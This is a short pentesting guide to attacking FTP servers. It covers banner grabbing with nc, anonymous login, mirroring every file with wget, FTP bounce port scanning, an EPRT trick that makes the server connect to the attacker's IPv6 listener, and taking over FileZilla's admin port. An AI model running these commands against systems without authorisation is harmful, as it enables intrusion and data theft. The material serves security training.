Physical attacks
Mobile Apps Pentesting
Pentesting

21 - Pentesting FTP

Basic Information

The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.

Default Port: 21

PORT STATE SERVICE
21/tcp open ftp

Banner Grabbing

nc -vn <IP> 21

Connections

In Active FTP the FTP client first initiates the control connection from its port N to FTP Servers command port – port 21. The client then listens to port N+1 and sends the port N+1 to FTP Server. FTP Server then initiates the data connection, from its port M to the port N+1 of the FTP Client.

But, if the FTP Client has a firewall setup that controls the incoming data connections from outside, then active FTP may be a problem. And, a feasible solution for that is Passive FTP.

In Passive FTP, the client initiates the control connection from its port N to the port 21 of FTP Server. After this, the client issues a passv comand. The server then sends the client one of its port number M. And the client initiates the data connection from its port P to port M of the FTP Server.

Source: https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/

Anon login

anonymous : anonymous ftp : ftp

ftp <IP>
>anonymous
>anonymous
>ls -a # List all files (even hidden) (yes, they could be hidden)
>binary #Set transmission to binary instead of ascii
>ascii #Set transmission to ascii instead of binary
>bye #exit

Browser connection

You can connect to a FTP server using a browser (like Firefox) using a URL like:

ftp://anonymous:anonymous@10.10.10.98

Download all files from FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

FTPBounce attack

Some FTP servers (almost anyone) allows the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server.

Read this to know how to detect and scan ports using this technique

You can also use this technique to make a bounce FTP server ask to another bounce FTP server to download some file for you. This is usefull if you know that the ip where a bounceFTP server has access to more files... Read this yo know how

In modern FTP services you can use the command EPRT instead of PORT to make the FTP service connect to a different IP/port. Indeed, this command also works with IPv6, so you can make the FTP service connect to your IPv6 and you will capture the IPv6 of the FTP machine (you can sometimes find the IPv6 less protected that the IPv4).

#Connect to FTP and make the IPv6 connection
# nc -nv <FTP-IP> 21
USER mk7hlqMYr1b77DWuiZ1kPkNZc2Q1SRRg
PASS mk7hlqMYr1b77DWuiZ1kPkNZc2Q1SRRg
EPRT |2|dead:beef:2::1007|5995|
list
# nc -6lvnp 5995 # Wait for the connection
Listening on :: 5995
Connection received on dead:beef::250:56ff:feb9:627d 50598

Pentest

Anon login and bounce FTP checks are perform by default by nmap with -sC option.

Filezilla Server

FileZilla usually binds to local an Administrative service for the FileZilla-Server (port 14147). If you can create a tunnel from your machine to access this port, you can connect to it using a blank password and create a new user for the FTP service.

Config files

ftpusers
ftp.conf
proftpd.conf